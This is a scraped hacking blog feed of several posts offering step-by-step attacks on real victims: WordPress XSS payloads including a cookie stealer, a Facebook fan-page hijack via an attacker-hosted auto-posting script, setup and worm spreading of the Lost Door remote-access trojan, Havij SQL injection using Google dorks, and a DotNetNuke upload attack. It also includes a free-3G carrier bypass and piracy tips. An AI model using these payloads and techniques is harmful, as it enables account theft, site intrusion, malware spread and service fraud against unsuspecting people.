Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.

How does it work?

Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection

Popup “alert” Box
<script>alert(‘hungry-hackers.com’)</script>

Redirect to www.hungry-hackers.com
<script>document.location=”http://hungry-hackers.com”</script>

Cookie Stealer (need a logging system in place)
<script>document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com”</script>

Solution:

Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did

According the Facebook statistics there are more than 750 Million Active facebook users. This makes is a very important target for all the hackers. I have no doubts that the developers at facebook are working 24×7 to make it as secure as possible but the hackers are also working 24×7 to find out a loophole using which they could take control of your account. But for our safety we also need to work a little harder. According to me, the best possible way to do this is by learning how to hack facebook yourself. If you know the loopholes you will never fall for it.

Now you might be thinking, how can I learn about hacking Facebook. If you ask me, I would say google it and learn it yourself. But I know that nobody has got so much time to search for each and every facebook hack possible. Luckily Rafay Baloch, the author of “A beginners Guide To Ethical Hacking”, has the answer to your question with his newly created “Facebook Hacking Course“.

Facebook hacking course is basically a set of videos which will show you different methods used by hackers to hack Facebook account passwords and how you can protect your self from getting hacked. It will include each and every possible methods that a hacker could use to get your facebook credentials. Along with each video you will get a lab which will tell you exactly how to replicate this attack in a safe environment. It also provides bonus techniques using which you could become anonymous on the internet. If you want to become a hacker this is the first thing you would want to learn. There is also a second bonus with it. You will get email support from none other than Rafay himself.

Now before you make your decision lets hear some words from Rafay: “Friends, if you ask me “Is Facebook safe?” my answer would be “Yes. Its safer than your own computer but remember it is still possible that your facebook account may get hacked and that is because all the hacking methods are client based and not server based, which means that the hackers directly attack you and not facebook. And securing your facebook account depends on how better you can avoid these attacks.”

Now I leave it up to you. You may go and take this course which I would highly recommend or you may leave it up to the hackers to find and hack your account.

How to get the Facebook Hacking Course?

You can get this Facebook hacking course from Here.

Are you tired of using the low speed 2G service? I know your answer is ‘YES’. We all want to lay our hands on the latest high speed 3G service which gives a  download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.

Requirements

1. Tata Docomo SIM Card with a balance of more than Rs. 1
2. 3G enabled cellphone

Steps

1. Create New Access Point Using Below Configuration and restart your cellphone.
   

   • Name : Tata Docomo or any
   • Access Point ( APN ) – tata.docomo.dive.in
   • Homepage : www.google.com or any
   • Proxy : 202.87.41.147
   • Proxy Port : 8080
   • Username : leave blank
   • Password : leave blank

2. Download Operamini 4.2 Handler Browser
3. Open your Opera mini handler and do the following changes in the Setiings:
   

   • Set Divein Settings as Default Settings For Opera Mini
   • Set http in Custom Field in your Opera Mini handler
   • Set Socket Server to http://203.115.112.5.server4.operamini.com OR http://10.124.72.171.server4.operamini.com
   • Keep Proxy Type as blank (Don’t Enter Anything in Proxy Server Field)

4. Done!! Now use your free unlimited 3G service. Enjoy!!

We all love torrents because they are free. In the last few weeks I have been downloading a lot of movies/softwares from torrents. While messing with the torrents I found a few things which turned out to be very fruitful. Today I will show you how to use those tricks to get maximum performance from your P2P Softwares.

Note: I use uTorrent so all the following Hacks have been tested on the latest version of uTorrent only. You may test it on other P2P softwares and let us know about your experience

1. Increase Download Speed

Do the following changes in the preference of uTorrent.

Go to Options>Preferences>Network

2. Block Fake Peers

Anti-P2P organizations are actively polluting P2P networks with fake peers, which send out fake or corrupt data in order to waste bandwidth and slow down file transfers. At its worst, when downloading major copyrighted torrents, as much as a fourth of the peers you are connected to can be attributed to various Anti-P2P agencies. There is also a much more serious side to this. Once you’ve established a connection to one of these fake “peers”, your IP has been logged and will most likely be sent to the RIAA/MPAA.

But there is a way to fight back! If you are using the latest uTorrent, you can employ a little known feature called IP filtering. The author of uTorrent has gone out of his way to hide it, but it’s there nonetheless. But before we can activate this filter, we need to retrieve a list of currently known Anti-P2P organization IPs.

This is most easily done by downloading the latest blacklist from Bluetack (the same people who wrote SafePeer for the Azureus BT client).

This list is updated daily, and contains all known Anti-P2P organizations, trackers and peers, aswell as all known Goverment/Military IP addresses as collected by the Bluetack team. Once downloaded, extract and rename the file to “ipfilter.dat” in preparation for the final step.

To make the list available to uTorrent, you need to put it in %AppData%\uTorrent\. So type this into the Address Bar, or click Start -> Run and type it there. After placing the ipfilter.dat in this folder, start uTorrent and go into preferences (Ctrl+P), then click on “Advanced”. In the right hand pane, make sure that “ipfilter.enable” is set to true, and then close the dialog. That’s it for the configuration.

You can verify that the list has been loaded by looking under the “Logging” tab of uTorrent, where you should see the line “Loaded ipfilter.dat (X entries)”.

3. Hide your IP

Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Hide My IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions. This software can not only be used in case of hiding your IP from other peers but also useful if you want to browse internet anonymously.

]]> http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html/feed 4 http://www.hungry-hackers.com/2011/02/how-to-hack-facebook-fan-page.html http://www.hungry-hackers.com/2011/02/how-to-hack-facebook-fan-page.html#comments Thu, 24 Feb 2011 04:18:43 +0000 Wamiq Ali http://www.hungry-hackers.com/?p=1911 Today I will show you how to hack a Facebook fan page. This is my first post at Hacking Truths and I am very excited about it. I hope you like this tutorial and give your feed back in the comments.

Now lets start the tutorial. First of all we will need to setup an exploit  and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.

Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.

1. Download the exploit from this Link.

2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from here.

3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.

4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)

5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:

www.yoursite.0fess.net/booster.js

6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.

javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)

Tip: You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.

About the author:

Wamiq Ali is a tech. lover and a hacker,this is his first post at hungry-hackers. Linux is one of his favourite platforms. He blogs at www.hackersthirst.com.

Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim’s computer remotely.

Disclaimer: Coder and related sites are not responsible for any abuse done using this software.

Follow the steps below to setup a server for Lost Door.

• Download Lost Door from here . (Update: In case the given download link doesn’t work, use this secondary download link. The password to unzip this file is “ehacking.nethungry-hacker.com” without double quotes.)
• On executing the download file, you will see the following screen. Accept it

• After it is open, right click on the window and click on create server

• Now enter your IP address and DNS here. Leave the rest of the field as it is.

• Now click on the ‘Options’  tab and choose the options as you want. To activate an offline keylogger is a good practice.

• Now go to ‘Advanced’ Tab. There will options related to spreading. This will be used in case you have more than 1 victim.

• Now just go to the ‘Create’ tab and click on create server. Your server is ready for use now and now send it to the victim.

Sending the server file to your victim

This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.

• If you have physical access to the victim’s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.
• For those who don’t have physical access can use social engineering in order to get the victim execute that file on his computer.

Using Spreading to affect multiple victims

If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.

About The Author

This post is written by an Irfan Shaeel An Ethical hacker and Penetration tester, Irfan blogs At his blog Ehacking.net

SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.

In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

• You can download havij from here.
• We will use google dorks to find the vulnerable websites, there is a big list of google dorks  which I will post in my future articles but at this time we will only use the following:

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

• Just search google using one of the dork and you will see a lot of vulnerable websites.
• Open any one of the website than put  ‘ after the link look:

• If you get the following SQL error, that means the website is vulnerable to SQL-injection attack.

  

• Now open Havij and paste the link without ‘

  

  

• Now we have to find the columns of the database.

  

  

• After this you will be able to find the admin id or password but remember normally web server uses MD5 encryption technique, you have to decrypt this password use havij option MD5 or you may read our tutorial on Cracking MD5.

• After decrypting the password, you have to find the admin login page of the website. To do that use Havij options.
• Now you may login as the admin user and control the website as you want.
• H@ppy H@cking

Video Tutorial

About The Author

Irfan Shakeel is an ethical hacker/penetration tester and he have found many bugs on the famous web server. He is the founder of Ethical Hacking Blog.

Everybody wants a personal Rapidshare Premium account but not all can afford it. If you are one of those people who can’t afford it or don’t want to ask your parent to buy you one then there are only 2 ways of getting a Rapidshare premium account. First one is to hack a Rapidshare premium account of some other user. Hacking a Rapidshare premium account isn’t that difficult. But Rapidshare guys are very smart. They provide users with a feature of security lock due to which you will need access to the unlock code for that account to change the password of that Rapidshare account. Thus you can only use that hacked account till the owner of that account changes the password. This one seems to be a temporary solution. Second way is to earn some easy bucks online and buy your own Rapidshare account. The second way may seem difficult at first but to tell you the truth its very easy.

Today I will show how you can earn money online and that too without much difficulty. Just follow the steps given below:

1. Create a Paypal Premium Account( Don’t Worry its free) . When asked for credit card details simply say cancel. You do not need to fill it.

2. Then Go to the following link:

http://www.AWSurveys.com

3. On joining this website, you will get 27 USD just for writing 7 simple surveys which will take not more than 30 minutes.

4. Now the only problem is that the minimum payout limit for this website is 75 USD. But you can earn 1.25 USD on referring this website to your friend.

5. So you just take the referral link from this website and paste it on your facebook status. Don’t forget to mention about it benefits so that your friends register through that link.

6. Suppose you have 500 friends on facebook and out of them only 10% register through your link then also you earn 62.5 USD which gets added to 27 USD that you had earned from surveys. Thus the total 89.5 USD crosses the Payout limit.

7. Now you can get that money into your Paypal Account use it not only to buy your own Rapidshare premium account but also for buying other stuff online.

8. That’s it. So Simple and I swear it works.

Update: Some people have a compliant that Awsurveys doesn’t pay them what they have earned and that it is a SPAM. I would like to tell you that I have already used this website earlier and I had received the payment every time. I am not saying that these guys are lying about their experience with Awsurveys but there are few reasons why they may not have received the payment. The only problem with this website is that it doesn’t communicate with the user if he is violating any terms and conditions instead of that it just cancels their payments. When you request some payout from this website, they have a policy to verify if the accounts that were referred by the user are not fraudulent and they remove the amount gained from these fraudulent accounts from the total amount in your account. Sometimes the reduced amount is less than the amount redeemed by the user and their harsh policy is to cancel the whole payment without even reimbursing the remaining amount. Now you might be thinking how to avoid this? One advice i would give you is to keep atleast 20-25 USD in excess when you are redeeming the amount. In this way you are making sure that even if there were 15 accounts which the website found to be fraudulent still the total wont get below the amount requested by you. Another condition is  of the maximum amount that one can redeem in a year. A user can redeem at max 550 USD in one year if you request for payout more than that then hey will just cancel that payment without reimbursing the money in your account. I already faced the latter one which indicates that I have atleast earned upto 550 USD.

Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

Below are the easy steps to implement the attack:

• First use a google dork to find the appropriate target.

inurl:”/portals/0″ site:.com

• You can change com to your desired domain name like bd ph ae
• Now search your website on the google after searching you will get many websites choose any one of it.

• Its time to check the required vulnerability on the website just place this code after the web address.

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

• For example if you got www.victim.com
• Replace it www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
• If you will get this screen means this web is going to hack.

• Now choose the third option “A File On Your Site” And than paste this java code on your address bar.

javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

• It will allow you to upload a files on this website you can upload text ~ swf ~ jpg ~ gif ~ pdf ~ Files.

• After uploading files you can find your file on this address www.victim.com/portals/0/yourfile.extension

here extension is txt jpg swf etc.

• In our case

www.victim.com/portals/0/b.txt

About The Author

Irfan Shakeel is an ethical hacker/penetration tester and he have found many bugs on the famous web server. He is the founder of Ethical Hacking Blog.

Xss Cross Site Scripting may be classified in two types:

1.Persistent XSS

2.Non Persistent XSS

In order to demonstrate a XSS attack I will take an example of a website:

http://www.redwrappings.co.in

Checking the venerability

The simplest way to check the vulnerability is to enter the following code in the any web form present on the website

<script>alert(“XSS”)</script>

Once the attacker inserts the code A dialog box like the below one will appear:

Defacement

Now the attacker has found that the website is velnerable to an xss attack the attacker can do lots of damages to the website, The most common thing which the attacker will do is place his defacement image on that page showing that the website is hacked, For this purpose he will insert a code similar to the below one:

<html><body><IMG SRC=”http://site.com/yourDefaceIMAGE.png”></body></html>

Where http://site.com/yourDefaceIMAGE.png is the defacement image

Inserting Flash Videos

The attacker can also insert flash videos by entering the following code in any web form present on the website

Redirection

The attacker can also redirect the page to any particular page , In case if the hacker has managed to find XSS venerability in the a website like paypal.com or alertpay.com he can redirect that page to a Phisher Site(Fake login page) where the victim will loose his password, To redirect a an xssed page to another page the attacker will insert a code similar to the below one:

<script>window.open( “http://www.google.com/” )</script>

Stealing Cookies

Most of the attackers after finding a website venerable to xss will probably steal victims cookies to gain access to their account or private data this method is called Session hijacking, which is a detailed topic and I will be explaining in the later articles

Hope you have learned some XSS ,Feel free to ask if you have any problem regarding the above information

About the Author

This is a guest post by Rafay baloch. Rafay Baloch is a the founder of Rafay Hacking Articles and the writer of the book A Beginners guide To Ethical Hacking